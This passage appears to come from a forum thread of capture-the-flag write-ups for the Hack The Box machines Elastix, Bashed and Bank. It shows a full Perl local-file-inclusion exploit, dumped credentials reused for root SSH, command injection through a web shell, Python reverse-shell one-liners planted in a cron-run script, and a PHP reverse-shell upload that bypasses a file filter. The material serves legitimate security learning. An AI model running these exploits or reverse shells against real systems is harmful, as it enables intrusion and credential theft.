(0.050s latency). PORT STATE SERVICE VERSION 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-litespeed-sourcecode-download: | Litespeed Web Server Source Code Disclosure (CVE-2010-2333) | /index.php source code: | <h1>Error - Bad Request</h1> |_<pre>This web server is running in SSL mode. Try the URL <a href='https://10.10.10.7:10000/'>https://10.10.10.7:10000/</a> instead.<br></pre> |_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug) | http-phpmyadmin-dir-traversal: | VULNERABLE: | phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion | State: UNKNOWN (unable to test) | IDs: CVE:CVE-2005-3299 | PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array. | | Disclosure date: 2005-10-nil | Extra information: | ../../../../../etc/passwd : | <h1>Error - Bad Request</h1> | <pre>This web server is running in SSL mode. Try the URL <a href='https://10.10.10.7:10000/'>https://10.10.10.7:10000/</a> instead.<br></pre> | | References: | http://www.exploit-db.com/exploits/1244/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure | http://www.exploit-db.com/exploits/1997/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) Apparently there could be local file inclusion and file disclosure vulnerabilities. msf6 auxiliary(admin/webmin/file_disclosure) > options Module options (auxiliary/admin/webmin/file_disclosure): Name Current Setting Required Description ---- --------------- -------- ----------- DIR /unauthenticated yes Webmin directory path Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file: <path>' RPATH /etc/passwd yes The file to download RPORT 10000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Auxiliary action: Name Description ---- ----------- Download Download arbitrary file msf6 auxiliary(admin/webmin/file_disclosure) > set RHOSTS 10.10.10.7 RHOSTS => 10.10.10.7 msf6 auxiliary(admin/webmin/file_disclosure) > set SSL true [!] Changing the SSL option's value may require changing RPORT! SSL => true msf6 auxiliary(admin/webmin/file_disclosure) > exploit [*] Running module against 10.10.10.7 [*] Attempting to retrieve /etc/passwd... [*] The server returned: 404 File not found <h1>Error - File not found</h1> [*] Auxiliary module execution completed Ok, so we receive a 404 File not found for /etc/passwd... Hm.. I have tried running it a couple more times until I decided to postpone it and look for other stuff. # Elastix Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. ## Elastix default username:passwords Quick google search reveals the following interesting pages: [Elastix Default Login Password](https://www.elastix.org/community/threads/default-passwords-not-password.8416/). I have tried the following credentials with no success. Elastix PBX Default Credentials Elastix PBX systems install with multiple default passwords according to the wiki manual: Initial access to the Web interface Enter in the Web interface: Open web browser and go to https://ip-address-of-elastix-server/ Username: admin Password: one you assigned @ install Initial access to third party applications 1. To use Sugar CRM: Username: admin Password: password 2. To use A2bill: Username: admin Password: mypassword 3. Operator Flash Panel (from 0.6 version): Password: eLaStIx.2oo7 4. For accessing Freepbx (without being contracted) use: Username: admin Password: admin 5. For accessing vtigerCRM use: Username: admin Password: admin ## Searchsploit # searchsploit elastix 1 ⨯ --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results After researching the exploits I found that according to [Security Focus](https://www.securityfocus.com/bid/55078/discuss) Elastix 'graph.php' Local File Include Vulnerability Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. Elastix 2.2.0 is vulnerable; other versions may also be affected. Ok, Let's locate the ***graph.php*** exploit on our machine # locate 37637.pl /usr/share/exploitdb/exploits/php/webapps/37637.pl The exploit's code: # cat 37637.pl source: https://www.securityfocus.com/bid/55078/info Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. Elastix 2.2.0 is vulnerable; other versions may also be affected. #!/usr/bin/perl -w #------------------------------------------------------------------------------------# #Elastix is an Open Source Sofware to establish Unified Communications. #About this concept, Elastix goal is to incorporate all the communication alternatives, #available at an enterprise level, into a unique solution. #------------------------------------------------------------------------------------# ############################################################ # Exploit Title: Elastix 2.2.0 LFI # Google Dork: :( # Author: cheki # Version:Elastix 2.2.0 # Tested on: multiple # CVE : notyet # romanc-_-eyes ;) # Discovered by romanc-_-eyes # vendor http://www.elastix.org/ print "\t Elastix 2.2.0 LFI Exploit \n"; print "\t code author cheki \n"; print "\t 0day Elastix 2.2.0 \n"; print "\t email: anonymous17hacker{}gmail.com \n"; #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action use LWP::UserAgent; print "\n Target: https://ip "; chomp(my $target=<STDIN>); $dir="vtigercrm"; $poc="current_language"; $etc="etc"; $jump="../../../../../../../..//"; $test="amportal.conf%00"; $code = LWP::UserAgent->new() or die "inicializacia brauzeris\n"; $code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action"; $res = $code->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ 'This file is part of FreePBX') { print "\n read amportal.conf file : $answer \n\n"; print " successful read\n"; } else { print "\n[-] not successful\n"; } So, let's go to the application and manually test it for LFI. https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action # This file is part of FreePBX. # # FreePBX is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # FreePBX is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with FreePBX. If not, see . # # This file contains settings for components of the Asterisk Management Portal # Spaces are not allowed! # Run /usr/src/AMP/apply_conf.sh after making changes to this file # FreePBX Database configuration # AMPDBHOST: Hostname where the FreePBX database resides # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) # AMPDBNAME: Name of the FreePBX database (e.g. asterisk) # AMPDBUSER: Username used to connect to the FreePBX database # AMPDBPASS: Password for AMPDBUSER (above) # AMPENGINE: Telephony backend engine (e.g. asterisk) # AMPMGRUSER: Username to access the Asterisk Manager Interface # AMPMGRPASS: Password for AMPMGRUSER # AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE # AMPBIN: Location of the FreePBX command line scripts # AMPSBIN: Location of (root) command line scripts # AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin # AMPWEBROOT: Path to Apache's webroot (leave off trailing slash) # AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash) # AMPWEBADDRESS: The IP address or host name used to access the AMP web admin # AMPWEBROOT=/var/www/html AMPCGIBIN=/var/www/cgi-bin # AMPWEBADDRESS=x.x.x.x|hostname # FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash) # FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel # FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise # FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3 # or if you don't want FOP. # #FOPRUN=true FOPWEBROOT=/var/www/html/panel #FOPPASSWORD=passw0rd FOPPASSWORD=jEhdIekWmdjE # FOPSORT=extension|lastname # DEFAULT VALUE: extension # FOP should sort extensions by Last Name [lastname] or by Extension [extension] # This is the default admin name used to allow an administrator to login to ARI bypassing all security. # Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well ARI_ADMIN_USERNAME=admin # This is the default admin password to allow an administrator to login to ARI bypassing all security. # Change this to a secure password. ARI_ADMIN_PASSWORD=jEhdIekWmdjE # AUTHTYPE=database|none # Authentication type to use for web admininstration. If type set to 'database', the primary # AMP admin credentials will be the AMPDBUSER/AMPDBPASS above. AUTHTYPE=database # AMPADMINLOGO=filename # Defines the logo that is to be displayed at the TOP RIGHT of the admin screen. This enables # you to customize the look of the administration screen. # NOTE: images need to be saved in the ..../admin/images directory of your AMP install # This image should be 55px in height AMPADMINLOGO=logo.png # USECATEGORIES=true|false # DEFAULT VALUE: true # Controls if the menu items in the admin interface are sorted by category (true), or sorted # alphabetically with no categories shown (false). # AMPEXTENSIONS=extensions|deviceanduser # Sets the extension behavior in FreePBX. If set to 'extensions', Devices and Users are # administered together as a unified Extension, and appear on a single page. # If set to 'deviceanduser', Devices and Users will be administered seperately. Devices (e.g. # each individual line on a SIP phone) and Users (e.g. '101') will be configured # independent of each other, allowing association of one User to many Devices, or allowing # Users to login and logout of Devices. AMPEXTENSIONS=extensions # ENABLECW=true|false ENABLECW=no # DEFAULT VALUE: true # Enable call waiting by default when an extension is created. Set to 'no' to if you don't want # phones to be commissioned with call waiting already enabled. The user would then be required # to dial the CW feature code (*70 default) to enable their phone. Most installations should leave # this alone. It allows multi-line phones to receive multiple calls on their line appearances. # CWINUSEBUSY=true|false # DEFAULT VALUE: true # For extensions that have CW enabled, report unanswered CW calls as 'busy' (resulting in busy # voicemail greeting). If set to no, unanswered CW calls simply report as 'no-answer'. # AMPBADNUMBER=true|false # DEFAULT VALUE: true # Generate the bad-number context which traps any bogus number or feature code and plays a # message to the effect. If you use the Early Dial feature on some Grandstream phones, you # will want to set this to false. # AMPBACKUPSUDO=true|false # DEFAULT VALUE: false # This option allows you to use sudo when backing up files. Useful ONLY when using AMPPROVROOT # Allows backup and restore of files specified in AMPPROVROOT, based on permissions in /etc/sudoers # for example, adding the following to sudoers would allow the user asterisk to run tar on ANY file # on the system: # asterisk localhost=(root)NOPASSWD: /bin/tar # Defaults:asterisk !requiretty # PLEASE KEEP IN MIND THE SECURITY RISKS INVOLVED IN ALLOWING THE ASTERISK USER TO TAR/UNTAR ANY FILE # CUSTOMASERROR=true|false # DEFAULT VALUE: true # If false, then the Destination Registry will not report unknown destinations as errors. This should be # left to the default true and custom destinations should be moved into the new custom apps registry. # DYNAMICHINTS=true|false # DEFAULT VALUE: false # If true, Core will not statically generate hints, but instead make a call to the AMPBIN php script, # and generate_hints.php through an Asterisk's #exec call. This requires Asterisk.conf to be configured # with "execincludes=yes" set in the [options] section. # XTNCONFLICTABORT=true|false # BADDESTABORT=true|false # DEFAULT VALUE: false # Setting either of these to true will result in retrieve_conf aborting during a reload if an extension # conflict is detected or a destination is detected. It is usually better to allow the reload to go # through and then correct the problem but these can be set if a more strict behavior is desired. # SERVERINTITLE=true|false # DEFAULT VALUE: false # Precede browser title with the server name. # USEDEVSTATE = true|false # DEFAULT VALUE: false # If this is set, it assumes that you are running Asterisk 1.4 or higher and want to take advantage of the # func_devstate.c backport available from Asterisk 1.6. This allows custom hints to be created to support # BLF for server side feature codes such as daynight, followme, etc. # MODULEADMINWGET=true|false # DEFAULT VALUE: false # Module Admin normally tries to get its online information through direct file open type calls to URLs that # go back to the freepbx.org server. If it fails, typically because of content filters in firewalls that # don't like the way PHP formats the requests, the code will fall back and try a wget to pull the information. # This will often solve the problem. However, in such environment there can be a significant timeout before # the failed file open calls to the URLs return and there are often 2-3 of these that occur. Setting this # value will force FreePBX to avoid the attempt to open the URL and go straight to the wget calls. # AMPDISABLELOG=true|false # DEFAULT VALUE: true # Whether or not to invoke the FreePBX log facility # AMPSYSLOGLEVEL=LOG_EMERG|LOG_ALERT|LOG_CRIT|LOG_ERR|LOG_WARNING|LOG_NOTICE|LOG_INFO|LOG_DEBUG|LOG_SQL|SQL # DEFAULT VALUE: LOG_ERR # Where to log if enabled, SQL, LOG_SQL logs to old MySQL table, others are passed to syslog system to # determine where to log # AMPENABLEDEVELDEBUG=true|false # DEFAULT VALUE: false # Whether or not to include log messages marked as 'devel-debug' in the log system # AMPMPG123=true|false # DEFAULT VALUE: true # When set to false, the old MoH behavior is adopted where MP3 files can be loaded and WAV files converted # to MP3. The new default behavior assumes you have mpg123 loaded as well as sox and will convert MP3 files # to WAV. This is highly recommended as MP3 files heavily tax the system and can cause instability on a busy # phone system. # CDR DB Settings: Only used if you don't use the default values provided by FreePBX. # CDRDBHOST: hostname of db server if not the same as AMPDBHOST # CDRDBPORT: Port number for db host # CDRDBUSER: username to connect to db with if it's not the same as AMPDBUSER # CDRDBPASS: password for connecting to db if it's not the same as AMPDBPASS # CDRDBNAME: name of database used for cdr records # CDRDBTYPE: mysql or postgres mysql is default # CDRDBTABLENAME: Name of the table in the db where the cdr is stored cdr is default # AMPVMUMASK=mask # DEFAULT VALUE: 077 # Defaults to 077 allowing only the asterisk user to have any permission on VM files. If set to something # like 007, it would allow the group to have permissions. This can be used if setting apache to a different # user then asterisk, so that the apache user (and thus ARI) can have access to read/write/delete the # voicemail files. If changed, some of the voicemail directory structures may have to be manually changed. # DASHBOARD_STATS_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 6 # DASHBOARD_INFO_UPDATE_TIME=integer_seconds # DEFAULT VALUE: 20 # These can be used to change the refresh rate of the System Status Panel. Most of # the stats are updated based on the STATS interval but a few items are checked # less frequently (such as Asterisk Uptime) based on the INFO value # ZAP2DAHDICOMPAT=true|false ZAP2DAHDICOMPAT=true # DEFAULT VALUE: false # If set to true, FreePBX will check if you have chan_dadhi installed. If so, it will # automatically use all your ZAP configuration settings (devices and trunks) and # silently convert them, under the covers, to DAHDI so no changes are needed. The # GUI will continue to refer to these as ZAP but it will use the proper DAHDI channels. # This will also keep Zap Channel DIDs working. # CHECKREFERER=true|false # DEFAULT VALUE: true # When set to the default value of true, all requests into FreePBX that might possibly add/edit/delete # settings will be validated to assure the request is coming from the server. This will protect the system # from CSRF (cross site request forgery) attacks. It will have the effect of preventing legitimately entering # URLs that could modify settings which can be allowed by changing this field to false. # USEQUEUESTATE=true|false # DEFAULT VALUE: false # Setting this flag will generate the required dialplan to integrate with the following Asterisk patch: # https://issues.asterisk.org/view.php?id=15168 # This feature is planned for a future 1.6 release but given the existence of the patch can be used prior. Once # the release version is known, code will be added to automatically enable this format in versions of Asterisk # that support it. # USEGOOGLEDNSFORENUM=true|false # DEFAULT VALUE: false # Setting this flag will generate the required global variable so that enumlookup.agi will use Google DNS # 8.8.8.8 when performing an ENUM lookup. Not all DNS deals with NAPTR record, but Google does. There is a # drawback to this as Google tracks every lookup. If you are not comfortable with this, do not enable this # setting. Please read Google FAQ about this: http://code.google.com/speed/public-dns/faq.html#privacy # MOHDIR=subdirectory_name # This is the subdirectory for the MoH files/directories which is located in ASTVARLIBDIR # if not specified it will default to mohmp3 for backward compatibility. MOHDIR=mohmp3 # RELOADCONFIRM=true|false # DEFAULT VALUE: true # When set to false, will bypass the confirm on Reload Box # FCBEEPONLY=true|false # DEFAULT VALUE: false # When set to true, a beep is played instead of confirmation message when activating/de-activating: # CallForward, CallWaiting, DayNight, DoNotDisturb and FindMeFollow # DISABLECUSTOMCONTEXTS=true|false # DEFAULT VALUE: false # Normally FreePBX auto-generates a custom context that may be usable for adding custom dialplan to modify the # normal behavior of FreePBX. It takes a good understanding of how Asterisk processes these includes to use # this and in many of the cases, there is no useful application. All includes will result in a WARNING in the # Asterisk log if there is no context found to include though it results in no errors. If you know that you # want the includes, you can set this to true. If you comment it out FreePBX will revert to legacy behavior # and include the contexts. # AMPMODULEXML lets you change the module repository that you use. By default, it # should be set to http://mirror.freepbx.org/ - Presently, there are no third # party module repositories. AMPMODULEXML=http://mirror.freepbx.org/ # AMPMODULESVN is the prefix that is appended to tags in the XML file. # This should be set to http://mirror.freepbx.org/modules/ AMPMODULESVN=http://mirror.freepbx.org/modules/ AMPDBNAME=asterisk ASTETCDIR=/etc/asterisk ASTMODDIR=/usr/lib/asterisk/modules ASTVARLIBDIR=/var/lib/asterisk ASTAGIDIR=/var/lib/asterisk/agi-bin ASTSPOOLDIR=/var/spool/asterisk ASTRUNDIR=/var/run/asterisk ASTLOGDIR=/var/log/asteriskSorry! Attempt to access restricted file. The above output reveals credentials in amportal.config file: User: admin/root | Password: jEhdIekWmdjE ...And login successful: Perhaps we could ssh? # ssh [email protected] 255 ⨯ Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 I have received an error which according to an opinion on the internet - it is received since the algorithm is considered legacy? Resolved it by manually selecting it. # ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] 255 ⨯ The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established. RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts. [email protected]'s password: Last login: Tue Jul 16 11:45:47 2019 Welcome to Elastix ---------------------------------------------------- To access your Elastix System, using a separate workstation (PC/MAC/Linux) Open the Internet Browser using the following URL: http://10.10.10.7 [root@beep ~]# [root@beep ~]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) The host reused his password so we're able to gain root through ssh.
  7. h3xu

    Bashed

    # Enumeration ## NMAP We have an open port at 80, running Apache 2.4.18 (UBUNTU). # nmap -A 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT Nmap scan report for 10.10.10.68 Host is up (0.050s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=4/8%OT=80%CT=1%CU=43586%PV=Y%DS=2%DC=T%G=Y%TM=606EAD62 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS( OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11 OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN( OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= OS:S) Network Distance: 2 hops TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 50.56 ms 10.10.14.1 2 50.73 ms 10.10.10.68 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds ## Let's see what's this website is about.## Dirbuster report It reveals bunch of directories and files that are interesting: DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Thu Apr 08 03:25:09 EDT 2021 -------------------------------- http://10.10.10.68:80 -------------------------------- Directories found during testing: Dirs found with a 200 response: / /css/ /dev/ /images/ /js/ /demo-images/ /php/ /uploads/ Dirs found with a 403 response: /icons/ /icons/small/ -------------------------------- Files found during testing: Files found with a 200 responce: /dev/phpbash.min.php /index.html /single.html /css/carouFredSel.css /css/clear.css /dev/phpbash.php /css/common.css /css/font-awesome.min.css /css/sm-clean.css /js/jquery.js /js/imagesloaded.pkgd.js /js/jquery.nicescroll.min.js /js/jquery.smartmenus.min.js /js/jquery.carouFredSel-6.0.0-packed.js /js/jquery.mousewheel.min.js /js/jquery.touchSwipe.min.js /js/jquery.easing.1.3.js /js/main.js /js/custom_google_map_style.js /js/html5.js /config.php /php/sendMail.php -------------------------------- The developer boasts about a phpbash file which he created onto the platform. Let's use it to get a foothold. # Burp Suite I am going to try and see the contents of the discovered files. ## Request The file runs bash commands on the local host. Let's cat our flags 🙂 POST /dev/phpbash.min.php/ HTTP/1.1 Host: 10.10.10.68 Content-Length: 41 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: */* Origin: http://10.10.10.68 Referer: http://10.10.10.68/dev/phpbash.min.php/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close cmd=cd /home/arrexel;pwd;ls;cat user.txt; ## Response user flag: 2c281f318555dbc1b856957c7147bfc1 HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 08:02:27 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Connection: close Content-Type: text/html; charset=UTF-8 /home/arrexel user.txt 2c281f318555dbc1b856957c7147bfc1 ### Let's see how we can escalate our privileges and gain root. Firstly, get reverse shell: 1. change attacking IP:PORT python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ### Let's upgrade our shell, so that we could make it more usable: 1. Spawn better shell: python3 -c 'import pty;pty.spawn("/bin/bash")' 2. Get access to term commands: export TERM=xterm 3. Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg # Privelege Esc. * Ran linenum.sh locally but nothing really was of interest. * Looked for SGID/SUID files. * finally looking into sudoers I received the following output: $ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL It seems we (www-data) could run commands as user scriptmanager since it does not require password. $ sudo -u scriptmanager whoami scriptmanager To become user *scriptmanager* we type in: sudo -u scriptmanager bash -i Let's enumerate further. What does this user owns or has access to? scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null /scripts/test.py /home/scriptmanager/.profile /home/scriptmanager/.bashrc /home/scriptmanager/.selected_editor /home/scriptmanager/.bash_history /home/scriptmanager/.bash_logout It appears it owns something within /scripts/test.py scriptmanager@bashed:/scripts$ cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close It opens test.txt and writes a string into it, hmm. Who owns test.txt? scriptmanager@bashed:/scripts$ ll total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 8 03:19 ./ drwxr-xr-x 23 root root 4096 Dec 4 2017 ../ -rw-r--r-- 1 scriptmanager scriptmanager 282 Apr 8 03:19 test.py -rw-r--r-- 1 root root 12 Apr 8 03:03 test.txt So, if it is executed by cron, test.py runs as root since it opens test.txt which is owned by root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) scriptmanager@bashed:/scripts$ cat test.py f = open("test.txt", "w") f.write("change 123!") python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.6",4444)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) f.close It writes out the ### pwn # nc -lnvp 1337 listening on \[any\] 1337 ... connect to \[10.10.14.24\] from (UNKNOWN) \[10.10.10.68\] 50176 /bin/sh: 0: can’t access tty; job control turned off # whoami root # cat /root/root.txt
  8. h3xu

    Bank

    # Enumeration ### NMAP The nmap scan reveals port 53, 80 and 22 open so we could assume that there is an http web application, DNS and ssh services. Let's enumerate the DNS and check out the findings in our browser. Host is up (0.047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3) # dig axfr @10.10.10.29 bank.htb ; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb ; (1 server found) ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 ;; Query time: 47 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) ;; WHEN: Tue May 11 03:28:16 EDT 2021 ;; XFR size: 6 records (messages 1, bytes 171) # Web App Enumeration #### /etc/hosts Add the IP address to our known hosts file in /etc/hosts as: 10.10.10.29 bank.htb chris.bank.htb ns.bank.htb #### chris.bank.htb bank.htb ns.bank.htb #### Dirbuster A couple of interesting directories were found for http://bank.htb including not present in the picture /balance-transfer/ directory. *user* and *ticket* files does not return anything but footer on the other hand: #### /balance-transfer/ Balance transfer is directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files. When opened, It seems that encryption failed since it is in plain text: --ERR ENCRYPT FAILED +=================+ | HTB Bank Report | +=================+ ===UserAccount=== Full Name: Christos Christopoulos Email: [email protected] Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 . ===UserAccount=== # Exploit I have logged in to the given account and discovered a Support page which provides file upload functionality which reveals a possible attack surface. ## LFI The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with burp suite. #### Burp Suite After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila... ## Shell Open a nc listener that will intercept the reverse call and execute the file. $ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 5492 100 5492 0 0 53843 0 --:--:-- --:--:-- --:--:-- 53843 PHP Notice: Undefined variable: daemon in Standard input code on line 184 Successfully opened reverse shell to 10.10.14.3:1234 ***yikes***, I just hacked myself 😄 Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such extension will be executed as php. So I have uploaded the reverse shell as an htb and just opened it which returned a shell. # nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982 Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 12:37:52 up 2:18, 0 users, load average: 